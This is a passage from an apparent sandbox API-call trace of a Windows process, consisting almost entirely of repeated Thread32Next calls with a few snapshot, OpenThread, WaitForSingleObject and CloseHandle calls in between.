lpte=0x14fe78) returned 1 [0241.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.699] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.700] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.710] CloseHandle (hObject=0x17c) returned 1 [0242.710] OpenThread (dwDesiredAccess=0x100000, bInheritHandle=0, dwThreadId=0x38c) returned 0x17c [0242.710] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0xffffffff) returned 0x0 [0278.446] CloseHandle (hObject=0x17c) returned 1 [0278.447] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0278.458] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.467] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.468] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.469] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.470] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.471] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.472] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.475] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.476] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.616] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.617] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.632] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.633] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.634] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.635] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.636] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.637] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.639] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0278.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.019] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.026] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.213] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.214] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.214] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.215] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.218] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.218] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.220] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.220] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.221] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.222] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.222] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.223] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.224] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.224] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.225] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.226] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.227] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.228] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.228] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.229] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.230] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.232] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.234] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.234] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.235] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0279.358] Thread32Next 